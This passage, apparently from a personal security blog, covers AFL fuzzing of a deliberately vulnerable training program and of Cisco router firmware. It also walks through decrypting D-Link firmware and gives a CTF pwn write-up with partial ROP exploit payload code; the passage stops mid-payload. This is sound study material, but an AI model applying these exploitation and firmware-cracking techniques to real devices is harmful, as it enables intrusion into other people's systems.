<code>demo</code>.</p><p>The <code>demo</code> is built with:</p><figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs routeros">cd quickstart<br><span class="hljs-attribute">CC</span>=afl-clang-fast <span class="hljs-attribute">AFL_HARDEN</span>=1 
make<br></code></pre></td></tr></table></figure><p>make builds the all target by default, and all builds vulnerable, so the command that actually runs is afl-clang-fast -g -w vulnerable.c -o vulnerable.</p><p><code>vulnerable.c</code> is shown below:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span 
class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br></pre></td><td class="code"><pre><code class="hljs cpp">$ cat vulnerable.c<br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string"><string.h></span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string"><stdio.h></span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string"><unistd.h></span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string"><stdlib.h></span></span><br><br><span class="hljs-meta">#<span class="hljs-keyword">define</span> INPUTSIZE 100</span><br><br><span class="hljs-function"><span class="hljs-type">int</span> <span class="hljs-title">process</span><span class="hljs-params">(<span class="hljs-type">char</span> *input)</span></span><br><span class="hljs-function"></span>{<br> <span class="hljs-type">char</span> *out;<br> <span 
class="hljs-type">char</span> *rest;<br> <span class="hljs-type">int</span> len;<br> <span class="hljs-keyword">if</span> (<span class="hljs-built_in">strncmp</span>(input, <span class="hljs-string">"u "</span>, <span class="hljs-number">2</span>) == <span class="hljs-number">0</span>)<br> { <span class="hljs-comment">// upper case command</span><br> <span class="hljs-type">char</span> *rest;<br> len = <span class="hljs-built_in">strtol</span>(input + <span class="hljs-number">2</span>, &rest, <span class="hljs-number">10</span>); <span class="hljs-comment">// how many characters of the string to upper-case</span><br> rest += <span class="hljs-number">1</span>; <span class="hljs-comment">// skip the first char (should be a space)</span><br> out = <span class="hljs-built_in">malloc</span>(len + <span class="hljs-built_in">strlen</span>(input)); <span class="hljs-comment">// could be shorter, but play it safe</span><br> <span class="hljs-keyword">if</span> (len > (<span class="hljs-type">int</span>)<span class="hljs-built_in">strlen</span>(input))<br> {<br> <span class="hljs-built_in">printf</span>(<span class="hljs-string">"Specified length %d was larger than the input!\n"</span>, len);<br> <span class="hljs-keyword">return</span> <span class="hljs-number">1</span>;<br> }<br> <span class="hljs-keyword">else</span> <span class="hljs-keyword">if</span> (out == <span class="hljs-literal">NULL</span>)<br> {<br> <span class="hljs-built_in">printf</span>(<span class="hljs-string">"Failed to allocate memory\n"</span>);<br> <span class="hljs-keyword">return</span> <span class="hljs-number">1</span>;<br> }<br> <span class="hljs-keyword">for</span> (<span class="hljs-type">int</span> i = <span class="hljs-number">0</span>; i != len; i++)<br> {<br> out[i] = rest[i] - <span class="hljs-number">32</span>; <span class="hljs-comment">// only handles ASCII</span><br> }<br> out[len] = <span class="hljs-number">0</span>;<br> <span class="hljs-built_in">strcat</span>(out, rest + len); 
<span class="hljs-comment">// append the remaining text</span><br> <span class="hljs-built_in">printf</span>(<span class="hljs-string">"%s"</span>, out);<br> <span class="hljs-built_in">free</span>(out);<br> }<br> <span class="hljs-keyword">else</span> <span class="hljs-keyword">if</span> (<span class="hljs-built_in">strncmp</span>(input, <span class="hljs-string">"head "</span>, <span class="hljs-number">5</span>) == <span class="hljs-number">0</span>)<br> { <span class="hljs-comment">// head command</span><br> <span class="hljs-keyword">if</span> (<span class="hljs-built_in">strlen</span>(input) > <span class="hljs-number">6</span>)<br> {<br> len = <span class="hljs-built_in">strtol</span>(input + <span class="hljs-number">4</span>, &rest, <span class="hljs-number">10</span>);<br> rest += <span class="hljs-number">1</span>; <span class="hljs-comment">// skip the first char (should be a space)</span><br> rest[len] = <span class="hljs-string">'\0'</span>; <span class="hljs-comment">// truncate string at specified offset</span><br> <span class="hljs-built_in">printf</span>(<span class="hljs-string">"%s\n"</span>, rest);<br> }<br> <span class="hljs-keyword">else</span><br> {<br> <span class="hljs-built_in">fprintf</span>(stderr, <span class="hljs-string">"head input was too small\n"</span>);<br> }<br> }<br> <span class="hljs-keyword">else</span> <span class="hljs-keyword">if</span> (<span class="hljs-built_in">strcmp</span>(input, <span class="hljs-string">"surprise!\n"</span>) == <span class="hljs-number">0</span>)<br> {<br> <span class="hljs-comment">// easter egg!</span><br> *(<span class="hljs-type">char</span> *)<span class="hljs-number">1</span> = <span class="hljs-number">2</span>;<br> }<br> <span class="hljs-keyword">else</span><br> {<br> <span class="hljs-keyword">return</span> <span class="hljs-number">1</span>;<br> }<br> <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;<br>}<br><br><span class="hljs-function"><span 
class="hljs-type">int</span> <span class="hljs-title">main</span><span class="hljs-params">(<span class="hljs-type">int</span> argc, <span class="hljs-type">char</span> *argv[])</span></span><br><span class="hljs-function"></span>{<br> <span class="hljs-type">char</span> *usage = <span class="hljs-string">"Usage: %s\n"</span><br> <span class="hljs-string">"Text utility - accepts commands and data on stdin and prints results to stdout.\n"</span><br> <span class="hljs-string">"\tInput | Output\n"</span><br> <span class="hljs-string">"\t------------------+-----------------------\n"</span><br> <span class="hljs-string">"\tu <N> <string> | Uppercased version of the first <N> bytes of <string>.\n"</span><br> <span class="hljs-string">"\thead <N> <string> | The first <N> bytes of <string>.\n"</span>;<br> <span class="hljs-type">char</span> input[INPUTSIZE] = {<span class="hljs-number">0</span>};<br><br> <span class="hljs-comment">// Slurp input</span><br> <span class="hljs-keyword">if</span> (<span class="hljs-built_in">read</span>(STDIN_FILENO, input, INPUTSIZE) < <span class="hljs-number">0</span>)<br> {<br> <span class="hljs-built_in">fprintf</span>(stderr, <span class="hljs-string">"Couldn't read stdin.\n"</span>);<br> }<br><br> <span class="hljs-type">int</span> ret = <span class="hljs-built_in">process</span>(input);<br> <span class="hljs-keyword">if</span> (ret)<br> {<br> <span class="hljs-built_in">fprintf</span>(stderr, usage, argv[<span class="hljs-number">0</span>]);<br> };<br> <span class="hljs-keyword">return</span> ret;<br>}<br></code></pre></td></tr></table></figure><p>The program reads its input and hands it to process, which handles it differently depending on the command:</p><p>u <N> <string>: upper-case the first N bytes of the string;<br>head <N> <string>: take the first N characters of the string;<br>surprise!: a hidden command that triggers a crash directly.<br>Run afl-fuzz against the program:</p><figure class="highlight ada"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs ada">afl-fuzz -i inputs -o <span class="hljs-keyword">out</span> 
./vulnerable<br></code></pre></td></tr></table></figure><p>The <code>inputs</code> directory is the seed directory. It is supplied by the user and should contain carefully prepared samples, since good seeds make <code>fuzz</code>ing markedly more effective. The <code>inputs</code> directory shipped with the exercise contains samples that trigger the <code>u</code> and <code>head</code> commands:</p><figure class="highlight elixir"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs elixir">youlin<span class="hljs-variable">@ubuntu</span><span class="hljs-symbol">:~/afl/afl-training/quickstart</span><span class="hljs-variable">$ </span>ls<br>afl-screenshot.png inputs <span class="hljs-title class_">Makefile</span> out <span class="hljs-title class_">README</span>.md vulnerable vulnerable.c<br>youlin<span class="hljs-variable">@ubuntu</span><span class="hljs-symbol">:~/afl/afl-training/quickstart</span><span class="hljs-variable">$ </span>ls inputs/<br>head u<br>youlin<span class="hljs-variable">@ubuntu</span><span class="hljs-symbol">:~/afl/afl-training/quickstart</span><span class="hljs-variable">$ </span>cat inputs/head <br>head <span class="hljs-number">20</span> <span class="hljs-title class_">This</span> string is going to be truncated at the <span class="hljs-number">20</span>th position.<br>youlin<span class="hljs-variable">@ubuntu</span><span class="hljs-symbol">:~/afl/afl-training/quickstart</span><span class="hljs-variable">$ </span>cat inputs/u<br>u <span class="hljs-number">4</span> capsme<br>youlin<span class="hljs-variable">@ubuntu</span><span class="hljs-symbol">:~/afl/afl-training/quickstart</span><span class="hljs-variable">$ </span><br></code></pre></td></tr></table></figure><p>Fuzzing result (I went off to do other things after starting it, but it actually finished very quickly):</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202401130050565.png" 
alt="image-20240113005059484"></p><p><code>out</code> now contains results: the <code>crashes</code> directory stores crashing inputs, and the <code>queue</code> directory stores the inputs that successfully triggered new paths, i.e. the interesting ones.</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202401130052315.png" alt="image-20240113005245259"></p><p>Feeding a crash input back to the program:</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202401130100261.png" alt="image-20240113010011207"></p><h1 id="使用AFL插桩程序(无源码)"><a href="#使用AFL插桩程序(无源码)" class="headerlink" title="使用AFL插桩程序(无源码)"></a>Using AFL to instrument a program (without source)</h1><p>The target is the RV130X_FW_1.0.3.55.bin firmware provided by hollk. First unpack it with binwalk:</p><figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">binwalk</span> -Me RV130X_FW_<span class="hljs-number">1.0.3.55</span>.bin<br></code></pre></td></tr></table></figure><p>This extracts a complete file system.</p><p><img src="https://gitee.com/blogyoulin/img/raw/master/images/202305082126512.png#id=ZPL1s&originHeight=313&originWidth=1792&originalType=binary&ratio=1&rotation=0&showTitle=false&status=done&style=none&title="></p><p>Then run jsonparse under qemu user-mode emulation to see what input format it expects:</p><figure class="highlight gradle"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs gradle">youlin@ubuntu:~<span class="hljs-regexp">/rw/</span>黑盒<span class="hljs-regexp">/_RV130X_FW_1.0.3.55.bin.extracted$ qemu-arm-static -L ./</span>squashfs-root<span class="hljs-regexp">/ ./</span>squashfs-root<span class="hljs-regexp">/usr/</span>sbin/jsonparse <br><br>usage: jsonparse [<span class="hljs-keyword">file</span>]<br><br>Below is a sample parse result:<br>test2() json_object_get_string(input)=<br>{ <span class="hljs-string">"pagination_response_record"</span>: { <span 
class="hljs-string">"page_index"</span>: <span class="hljs-string">"1"</span>, <span class="hljs-string">"last_index"</span>: <span class="hljs-string">"1"</span>, <span class="hljs-string">"total_records"</span>: <span class="hljs-string">"2"</span>, <span class="hljs-string">"self_link"</span>: <span class="hljs-string">"https:\/\/api-stage.cisco.com\/software\/stage\/v2.0\/metadata\/udi\/NAME:RV215W,DESCR:Cisco RV215W Wireless N VPN Firewall, PID:RV215W-A-K9-NA, VID:V01, SN:CCQ163612VP\/mdf_id\/284436489\/software_type_id\/282487380\/current_release\/7.0.220.0?output_release=LATEST"</span>, <span class="hljs-string">"page_records"</span>: <span class="hljs-string">"25"</span>, <span class="hljs-string">"title"</span>: <span class="hljs-string">"Get Metadata by UDI, MDF ID & Image Names â<80><93> Download API"</span> }, <span class="hljs-string">"metadata_response"</span>: { <span class="hljs-string">"metadata_trans_id"</span>: <span class="hljs-string">"9746"</span>, <span class="hljs-string">"metadata_id_list"</span>: { <span class="hljs-string">"udi"</span>: <span class="hljs-string">"NAME:RV215W,DESCR:Cisco RV215W Wireless N VPN Firewall, PID:RV215W-A-K9-NA, VID:V01, SN:CCQ163612VP"</span>, <span class="hljs-string">"mdf_id"</span>: <span class="hljs-string">"284436489"</span>, <span class="hljs-string">"software_list"</span>: { <span class="hljs-string">"platform_list"</span>: [ { <span class="hljs-string">"release_list"</span>: [ { <span class="hljs-string">"release_version"</span>: <span class="hljs-string">"1.1.0.5"</span>, <span class="hljs-string">"release_fcs_date"</span>: <span class="hljs-string">"2013-04-10 00:00:00.0"</span>, <span class="hljs-string">"image_details"</span>: [ { <span class="hljs-string">"image_guid"</span>: <span class="hljs-string">"8893B41F4FD3DF71FA3D03B636205BD613BEE766"</span>, <span class="hljs-string">"related_image"</span>: <span class="hljs-string">"N"</span>, <span class="hljs-string">"image_name"</span>: <span 
class="hljs-string">"RV215W_FW_1.1.0.5.bin"</span>, <span class="hljs-string">"image_size"</span>: <span class="hljs-string">"10912768"</span>, <span class="hljs-string">"image_checksums"</span>: { <span class="hljs-string">"md5_checksum"</span>: <span class="hljs-string">"0e1792082f4a13b8eb256e92ff5ce501"</span> }, <span class="hljs-string">"image_description"</span>: <span class="hljs-string">"RV215W_FW_1.1.0.5.bin"</span>, <span class="hljs-string">"encryption_software_indicator"</span>: <span class="hljs-string">"Y"</span>, <span class="hljs-string">"image_level_docs"</span>: <span class="hljs-keyword">null</span> }, { <span class="hljs-string">"image_guid"</span>: <span class="hljs-string">"187A05709F5BDEEEE38E4002AE014F4659859C2B"</span>, <span class="hljs-string">"related_image"</span>: <span class="hljs-string">"N"</span>, <span class="hljs-string">"image_name"</span>: <span class="hljs-string">"USB_dynamic_module_file.zip"</span>, <span class="hljs-string">"image_size"</span>: <span class="hljs-string">"116182"</span>, <span class="hljs-string">"image_checksums"</span>: { <span class="hljs-string">"md5_checksum"</span>: <span class="hljs-string">"1d6f78a9edbea935026bb8a2be5cc715"</span> }, <span class="hljs-string">"image_description"</span>: <span class="hljs-string">"The USB dynamic module files of RV215W 1.1.0.5 version"</span>, <span class="hljs-string">"encryption_software_indicator"</span>: <span class="hljs-string">"Y"</span>, <span class="hljs-string">"image_level_docs"</span>: <span class="hljs-keyword">null</span> } ], <span class="hljs-string">"release_level_docs"</span>: { <span class="hljs-string">"release_doc_name"</span>: <span class="hljs-string">"Release Notes and Open Source Documentation for 1.1.0.5"</span>, <span class="hljs-string">"release_doc_url"</span>: <span class="hljs-string">"http:\/\/www.cisco.com\/en\/US\/products\/ps9923\/prod_release_notes_list.html"</span>, <span class="hljs-string">"release_doc_type"</span>: <span 
class="hljs-string">"null"</span> }, <span class="hljs-string">"security_advisory"</span>: <span class="hljs-string">"\/en\/US\/products\/ps9923\/prod_security_advisories_list.html"</span> } ] } ], <span class="hljs-string">"software_type_id"</span>: <span class="hljs-string">"282487380"</span>, <span class="hljs-string">"software_type_name"</span>: <span class="hljs-string">"Wireless Router Firmware"</span> }, <span class="hljs-string">"mdf_concept_name"</span>: <span class="hljs-string">"Cisco RV215W Wireless-N VPN Router"</span> } }, <span class="hljs-string">"service_status"</span>: { <span class="hljs-string">"status"</span>: <span class="hljs-string">"success"</span> } }<br></code></pre></td></tr></table></figure><p>As hollk advised, fuzz with data that is as short as possible, so the following input was used:</p><p><img src="https://gitee.com/blogyoulin/img/raw/master/images/202305082144437.png#id=eeoQc&originHeight=159&originWidth=2357&originalType=binary&ratio=1&rotation=0&showTitle=false&status=done&style=none&title="></p><p>Then start fuzzing:</p><figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs awk">QEMU_LD_PREFIX=.<span class="hljs-regexp">/squashfs-root/</span> ~<span class="hljs-regexp">/tools/</span>AFLplusplus-stable<span class="hljs-regexp">/afl-fuzz -Q -i ./i</span>nput<span class="hljs-regexp">/ -o ./</span>output<span class="hljs-regexp">/ -- ./</span>squashfs-root<span class="hljs-regexp">/usr/</span>sbin/jsonparse @@<br></code></pre></td></tr></table></figure><p>Two crashes turned up after only a short run, so I stopped it with Ctrl-C and looked at the two crashes in the output directory:</p><p><img src="https://gitee.com/blogyoulin/img/raw/master/images/202305082149470.png#id=TVylF&originHeight=825&originWidth=2139&originalType=binary&ratio=1&rotation=0&showTitle=false&status=done&style=none&title="></p><p><img 
src="https://gitee.com/blogyoulin/img/raw/master/images/202305082151872.png#id=WCzVJ&originHeight=397&originWidth=2375&originalType=binary&ratio=1&rotation=0&showTitle=false&status=done&style=none&title="></p><p>Looking at the raw crash file alone I could not quite make sense of it; it is easier to feed it straight back to the program:</p><figure class="highlight gradle"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs gradle">qemu-arm-<span class="hljs-keyword">static</span> -L .<span class="hljs-regexp">/squashfs-root/</span> .<span class="hljs-regexp">/squashfs-root/u</span>sr<span class="hljs-regexp">/sbin/</span>jsonparse .<span class="hljs-regexp">/output/</span><span class="hljs-keyword">default</span><span class="hljs-regexp">/crashes/i</span>d\:<span class="hljs-number">000000</span>\,sig\:<span class="hljs-number">11</span>\,src\:<span class="hljs-number">000000</span>\,time\:<span class="hljs-number">48</span>\,execs\:<span class="hljs-number">89</span>\,op\:havoc\,rep\:<span class="hljs-number">8</span><br></code></pre></td></tr></table></figure><p><img src="https://gitee.com/blogyoulin/img/raw/master/images/202305082155411.png#id=NnKkr&originHeight=170&originWidth=2366&originalType=binary&ratio=1&rotation=0&showTitle=false&status=done&style=none&title="></p><p>We can see that the program has a stack overflow; exploiting it would require further analysis.</p>]]></content>
</entry>
<entry>
<title>Learning Firmware Decryption</title>
<link href="/2023/11/16/%E5%9B%BA%E4%BB%B6%E8%A7%A3%E5%AF%86%E5%AD%A6%E4%B9%A0/"/>
<url>/2023/11/16/%E5%9B%BA%E4%BB%B6%E8%A7%A3%E5%AF%86%E5%AD%A6%E4%B9%A0/</url>
<content type="html"><![CDATA[<h1 id="固件解密思路学习"><a href="#固件解密思路学习" class="headerlink" title="固件解密思路学习"></a>Learning how to approach firmware decryption</h1><p>Example firmware: <a href="https://support.dlink.com/ProductInfo.aspx?m=DIR-822-US">https://support.dlink.com/ProductInfo.aspx?m=DIR-822-US</a></p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202311242039286.png" alt="img"></p><p>First run binwalk -E DIR822C1_FW3 to inspect the entropy of the firmware. It stays almost constant at around 1, which suggests that the different parts of the firmware may have been encrypted.</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202311242039944.png" alt="img"></p><p>The documentation on the vendor site mentions an intermediate firmware version, v303WWb04_middle, so we need to find a way to download it.</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202311242040304.png" alt="img"></p><p>D-Link provides an FTP server for firmware downloads, but I apparently could not work out how to use it (sadly), so I downloaded the intermediate version from 异步社区 instead:</p><p><a href="https://box.lenovo.com/l/8ufzWe">https://box.lenovo.com/l/8ufzWe</a></p><p>After downloading the intermediate version, unpacking it with binwalk yields a complete file system.</p><p>Use grep in squashfs-root to search for key strings such as update, firmware, upgrade and download:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plain">grep -r Download<br></code></pre></td></tr></table></figure><p>From the output below, the file StartFirmwareDownload.php in etc/templates/hnap contains the string Download<img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202311242045236.png" alt="img"></p><p>Opening StartFirmwareDownload.php, there is a comment line reading fw encimg </p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202311242045375.png" alt="img"></p><p>This piece of code performs several operations: it first uses cat to read the value of /etc/config/image_sign and assigns it to the $image_sign variable; then it uses fwrite to run encimg -d -i “.$fw_path.” -s “.$image_sign.</p><p>First look at the value of /etc/config/image_sign:</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202311242045216.png" alt="img"></p><p>It contains wrgac43s_dlink.2015_dir822c1, which is the value of the $image_sign variable. The next step is to run encimg, so locate the encimg binary and check its file type:</p><p><img 
src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202311242047021.png" alt="img"></p><p>可以看到程序为mips大端序架构,将qemu-mips-static移动到当前目录下。使用qemu进行模拟运行</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202311242047504.png" alt="img"></p><p>发现需要添加几个参数才能正常运行,encimg -d -i “.$fw_path.” -s “.$image_sign.,在之前的代码中可以知道fw_patch为加密的固件的路径,image_sign为之前读到的值wrgac43s_dlink.2015_dir822c1</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202311242047018.png" alt="img"></p><p>至此固件已经解密成功,后面就可以正常binwalk解包进行分析然后挖洞了</p>]]></content>
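As an added illustration of the entropy check above (my own example, not code from the original post or from the binwalk project): a small block-entropy scanner that reproduces the curve binwalk -E plots and merges the ranges that stay near 1.0. The image it scans is a constructed byte string, not DIR822C1_FW3; the block size, threshold and the 2015 seed are assumptions. A flat profile near 1.0 from offset 0 with no low-entropy header, as on the D-Link image, is what points to encryption, since compressed payloads also score near 1.0 but normally sit between lower-entropy headers and metadata.

```python
import math
import random
from collections import Counter


def shannon_entropy(block):
    """Normalised Shannon entropy of a byte block: 0.0 for a constant block,
    1.0 for a block whose 256 byte values are uniformly distributed."""
    n = len(block)
    if n == 0:
        return 0.0
    bits = 0.0
    for count in Counter(block).values():
        p = count / n
        bits -= p * math.log2(p)
    return bits / 8.0


def entropy_profile(data, block_size=4096):
    """Per-block entropy in file order; this is the curve binwalk -E plots."""
    return [shannon_entropy(data[i:i + block_size])
            for i in range(0, len(data), block_size)]


def high_entropy_regions(data, block_size=4096, threshold=0.95):
    """Merge consecutive blocks scoring at or above threshold into (start, end)
    byte ranges. Encrypted and compressed payloads both show up here; which one
    it is has to be decided from the surrounding headers, not from the number."""
    regions = []
    start = None
    for idx, score in enumerate(entropy_profile(data, block_size)):
        offset = idx * block_size
        above = score >= threshold
        if above and start is None:
            start = offset
        elif not above and start is not None:
            regions.append((start, offset))
            start = None
    if start is not None:
        regions.append((start, len(data)))
    return regions


# Constructed sample image (not a real firmware): a zeroed 8 KiB header,
# 32 KiB of pseudo-random bytes standing in for an encrypted payload,
# and a zeroed 4 KiB trailer. The seed only makes the sample reproducible.
_rng = random.Random(2015)
SAMPLE_IMAGE = (bytes(8192)
                + bytes(_rng.getrandbits(8) for _ in range(32768))
                + bytes(4096))


def scan_sample():
    """Regions of SAMPLE_IMAGE that look encrypted or compressed."""
    return high_entropy_regions(SAMPLE_IMAGE)


if __name__ == "__main__":
    for start, end in scan_sample():
        print("high-entropy region: 0x%x - 0x%x" % (start, end))
```

On the real image the whole file would come back as a single region starting at offset 0, which is exactly the "almost constant at 1" picture from binwalk -E.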
</entry>
<entry>
<title>Pengcheng Cup (鹏城杯) challenge reproduction</title>
<link href="/2023/11/05/%E9%B9%8F%E5%9F%8E%E6%9D%AF%E5%A4%8D%E7%8E%B0/"/>
<url>/2023/11/05/%E9%B9%8F%E5%9F%8E%E6%9D%AF%E5%A4%8D%E7%8E%B0/</url>
<content type="html"><![CDATA[<h1 id="silent"><a href="#silent" class="headerlink" title="silent"></a>silent</h1><p>A challenge that only reads input and never prints anything.</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202311051232949.png" alt="image-20231105123242872"></p><p>puruse's exploit is built around a single gadget:</p><figure class="highlight x86asm"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs x86asm"><span class="hljs-number">0x00000000004007e8</span> : <span class="hljs-keyword">add</span> <span class="hljs-built_in">dword</span> <span class="hljs-built_in">ptr</span> [<span class="hljs-built_in">rbp</span> - <span class="hljs-number">0x3d</span>], <span class="hljs-built_in">ebx</span> <span class="hljs-comment">; nop dword ptr [rax + rax] ; ret</span><br></code></pre></td></tr></table></figure><p>From experience, the place to look is the add gadgets in the binary:</p><figure class="highlight vim"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs vim">ROPgadget --binary <span class="hljs-keyword">silent</span> |<span class="hljs-keyword">grep</span> <span class="hljs-built_in">add</span><br></code></pre></td></tr></table></figure><p>The plan is then to pivot the stack onto .bss and use the __libc_csu_init gadgets to control rbx and rbp, so that the add gadget can patch the stdout pointer stored in .bss.</p><p>First compute the offset between the value held by stdout (the address of _IO_2_1_stdout_ in libc) and the real address of puts:</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202311051241505.png" alt="image-20231105124124407"></p><p>In hex, as a 64-bit two's complement value: 0xffffffffffc94210. The gadget adds the 32-bit ebx, so only the low dword 0xffc94210 is actually applied; that is enough because puts and _IO_2_1_stdout_ sit in the same libc mapping and share the high dword of their addresses.</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202311051244274.png" alt="image-20231105124441240"></p><p>So the idea is to turn the stdout pointer into a pointer to puts. Payload:</p><figure class="highlight isbl"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs isbl"><span class="hljs-variable">payload</span>=<span class="hljs-variable">b</span><span class="hljs-string">'A'</span>*<span class="hljs-number">0</span><span 
class="hljs-variable">x40</span>+<span class="hljs-variable">b</span><span class="hljs-string">'A'</span>*<span class="hljs-number">8</span>+<span class="hljs-function"><span class="hljs-title">p64</span>(<span class="hljs-variable">pop_rbx_rbp_r12_r13_r14_r15</span>)+<span class="hljs-title">p64</span>(<span class="hljs-number">0</span><span class="hljs-variable">xffffffffffc94210</span>)+<span class="hljs-title">p64</span>(<span class="hljs-variable">stdout</span>+<span class="hljs-number">0</span><span class="hljs-variable">x3d</span>)+<span class="hljs-title">p64</span>(<span class="hljs-number">0</span>)*<span class="hljs-number">4</span>+<span class="hljs-title">p64</span>(<span class="hljs-variable">magic</span>)+<span class="hljs-title">p64</span>(<span class="hljs-variable">pop_rsi_r15</span>)+<span class="hljs-title">p64</span>(<span class="hljs-number">0</span><span class="hljs-variable">x601b10</span>)+<span class="hljs-title">p64</span>(<span class="hljs-number">0</span>)+<span class="hljs-title">p64</span>(<span class="hljs-variable">read_plt</span>)+<span class="hljs-title">p64</span>(<span class="hljs-variable">pop_rbp</span>)+<span class="hljs-title">p64</span>(<span class="hljs-number">0</span><span class="hljs-variable">x601b10</span>-<span class="hljs-number">8</span>)+<span class="hljs-title">p64</span>(<span class="hljs-variable">leave_ret</span>)</span><br><span class="hljs-function"><span class="hljs-title">s</span>(<span class="hljs-variable">payload</span>)</span><br></code></pre></td></tr></table></figure><p>Next, use the csu gadget call ds:(__frame_dummy_init_array_entry - 600D90h)[r12+rbx*8] with r12 = 0x601020 (the stdout slot) and rbx = 0: it calls through the patched pointer, i.e. puts, with the GOT entry of alarm in r13 as the argument, which leaks a libc address. Payload:</p><figure class="highlight stylus"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs stylus">payload1=<span class="hljs-built_in">p64</span>(pop_rbx_rbp_r12_r13_r14_r15)+<span class="hljs-built_in">p64</span>(<span 
class="hljs-number">0</span>)+<span class="hljs-built_in">p64</span>(<span class="hljs-number">1</span>)+<span class="hljs-built_in">p64</span>(<span class="hljs-number">0</span>x601020)+<span class="hljs-built_in">p64</span>(elf<span class="hljs-selector-class">.got</span><span class="hljs-selector-attr">[<span class="hljs-string">'alarm'</span>]</span>)+<span class="hljs-built_in">p64</span>(<span class="hljs-number">0</span>)*<span class="hljs-number">2</span>+<span class="hljs-built_in">p64</span>(csu_2)+<span class="hljs-built_in">p64</span>(pop_rsi_r15)+<span class="hljs-built_in">p64</span>(<span class="hljs-number">0</span>x601310)+<span class="hljs-built_in">p64</span>(<span class="hljs-number">0</span>)+<span class="hljs-built_in">p64</span>(<span class="hljs-number">1</span>)+<span class="hljs-built_in">p64</span>(<span class="hljs-number">2</span>)+<span class="hljs-built_in">p64</span>(<span class="hljs-number">3</span>)+<span class="hljs-built_in">p64</span>(<span class="hljs-number">4</span>)+<span class="hljs-built_in">p64</span>(pop_rbp)+<span class="hljs-built_in">p64</span>(<span class="hljs-number">0</span>x601a00+<span class="hljs-number">0</span>x40)+<span 